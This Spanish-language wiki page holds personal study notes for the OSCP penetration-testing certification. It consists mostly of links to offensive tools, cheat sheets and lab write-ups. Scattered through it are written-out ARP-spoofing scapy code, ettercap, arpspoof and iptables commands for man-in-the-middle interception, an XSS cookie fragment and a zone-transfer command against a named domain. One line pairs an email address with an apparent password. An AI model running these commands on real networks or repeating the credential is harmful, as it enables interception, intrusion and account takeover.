Herramientas de usuario

Herramientas del sitio


Barra lateral

enlaces:seguridad:certificaciones:oscp

Profesional certificado en seguridad ofensiva (OSCP)

Profesional certificado en seguridad ofensiva (OSCP) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)1​2​ La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3​ Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.

Referencias para prepararse

  • shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation

beef project

sitio de boca buscar alert(document.cookie)</script>

https://www.netcraft.com/

https://www.seleniumhq.org/

https://panopticlick.eff.org/

https://beefproject.com/

dig @200.111.157.67 unap.cl -t AXFR

https://www.acunetix.com/

https://github.com/1N3/Sn1per

portnocking

https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/

https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/

https://kali.training/topic/introduction-to-kali-linux/

https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/

(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)

https://tools.kali.org/information-gathering/nmap

ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1

https://3.14.by/en/md5

https://github.com/alearea51/IKn0wU

https://github.com/TunisianEagles/SocialBox

https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne

https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf

https://github.com/vk496/linset

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/

https://github.com/WifiPhisher

https://github.com/xtr4nge/FruityWifi

scapy

a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)
send(a, inter=3, loop=1)

a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)

10.168.40.1

ip a falsear ip victima mac victima a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)

send(a, inter=3, loop=1)

ettercap

ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/// 

tcpdump -n -i wlan0 -e 'arp or icmp'

arping -c 1 -I wlan0 10.168.40.1 ARPING 10.168.40.1 60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec 60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec

— 10.168.40.1 statistics —

https://sandilands.info/sgordon/arp-spoofing-on-wired-lan

mitmproxy

arpspoof -i eth0 -t 10.168.40.70 10.168.40.1

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080

mitmproxy –mode transparent


bettercap -T ipvictima –proxy -P

https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/

w2af http://exploitpack.com/


WIFI

https://github.com/xtr4nge/FruityC2


android https://github.com/M4sc3r4n0/Evil-Droid

extra

https://github.com/nixawk/pentest-wiki

https://geekflare.com/online-scan-website-security-vulnerabilities/

otra

https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion

https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication

https://www.offensive-security.com/metasploit-unleashed/

https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

OSCP

https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md

https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/

https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html

https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/

https://www.exam-labs.com/exam/NSE4#tutorial

https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/

https://wiki.wireshark.org/SampleCaptures

https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8

https://openwall.info/wiki/

https://github.com/ibr2/pwk-cheatsheet

https://www.keiththome.com/oscp-course-review/

http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/

https://amonsec.net/course/offensive-security-pwk-course-review

https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/

https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/

http://www.vividmachines.com/shellcode/shellcode.html

https://www.securitysift.com/offsec-ctp-osce/

https://hackforums.net/member.php cayuqueo@gmail.com EBM1JUD1yq57pmgUAiqHQ

http://nixware.net/my-osce-journey

http://www.cs.virginia.edu/~evans/cs216/guides/x86.html

https://www.pentesteracademy.com/topics

https://openwall.info/wiki/p_lkrg/Main

https://github.com/tanc7/hacking-books

https://github.com/tanc7

https://infosecuritygeek.com/vulnhub-kioptrix-2014/

http://www.securitysift.com/offsec-pwb-oscp/

https://xapax.gitbooks.io/security/content/

https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1

https://github.com/xapax/oscp

https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19

Cupp para crear diccionarios git clone https://github.com/Mebus/cupp.git

Generar ataques de Bruteforce a redes sociales git clone https://github.com/TunisianEagles/SocialBox.git

Dump de passwords (Volcado de memoria) https://github.com/AlessandroZ/LaZagne

Cracking WPA/WPA2 con phishing https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher

instabridge

–mode transparent

mitm.it/cert/p12

bettercap -T [ip_victima] –proxy -P

Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git

https://www.giuspen.com/cherrytree/

https://github.com/mikaelkall/HackingAllTheThings

https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/

https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1

https://github.com/so87/OSCP-PwK

https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0

https://github.com/OlivierLaflamme/Cheatsheet-God

https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1

https://www.giuspen.com/cherrytree/

http://www.fuzzysecurity.com/tutorials/16.html

Good reviews of CTP/OSCE (in no particular order):

Note: * mark means look for other posts on this blog

Tutorial sites (more stars = better/recommended):

Cheatsheets:

Good practice sites:

Vulnerable machines: vulnhub VMs: SickOS 1.1 SickOS 1.2 Droopy v0.2 Kevgir Pegasus SecTalks: BNE0x00 - Minotaur SecTalks: BNE0x03 - Simple NullByte: 1 FristiLeaks 1.3 OWASP Vulnerable Web Applications Directory Project Mutillidae Damn Vulnerable Web Application

LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/

Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory

eBooks downloads: http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/ https://github.com/JpGallegos/CySecBooks https://www.securepla.net/the-hacker-playbook-2/ “Hacking: The Art of Exploitation”

https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo - Fuzzing (Scapy, TAO, Sulley) - Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP) - Web Application Hacker's Handbook (might be too large: Consider “webgoat”)

Various sites: http://www.sweetscape.com/ (010 Editor) https://github.com/campagnola/pycca https://github.com/Gallopsled/pwntools https://github.com/reyammer/shellnoob https://zeltser.com/convert-shellcode-to-assembly/ http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps https://github.com/peterferrie/win-exec-calc-shellcode http://www.secniu.com/why-my-shellcode-cannot-work/ http://thestarman.pcministry.com/asm/2bytejumps.htm http://blog.noobroot.com/ https://www.exploit-db.com/exploits/5342/ http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/ https://github.com/salcho/codetz http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html http://www.fuzzing.org/ http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://0x41.no/hacking-networks-with-snmp/ http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ http://codemachine.com/downloads.html

Fun random stuff: http://patriciopalladino.com/files/hieroglyphy/ http://n01g3l.tumblr.com/ https://twitter.com/ch3rn0byl/status/832681279900487680

https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/

https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/

https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs

https://github.com/0x90/uberscapy

https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts

https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://underc0de.org/foro/hacking/que-es-una-shellcode/

https://0x00sec.org/t/linux-shellcoding-part-1-0/289

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://github.com/Grazfather/PracticalMalwareLabs https://github.com/Grazfather/BlackHatPython

https://github.com/VulnHub/ctf-writeups

https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html

https://github.com/trustedsec

https://exploit.courses/#/challenges

https://payatu.com/guide-linux-privilege-escalation/

https://github.com/dobin/yookiterm-slides

https://exploit.courses/files/bfh2018/content.html

https://exploit.courses/files/bfh2017/content.html

https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools

https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/

https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html

https://www.exploit-db.com/exploits/44298

https://github.com/jivoi/pentest

https://github.com/lucyoa/kernel-exploits

enlaces/seguridad/certificaciones/oscp.txt · Última modificación: 2018/12/13 14:37 por cayu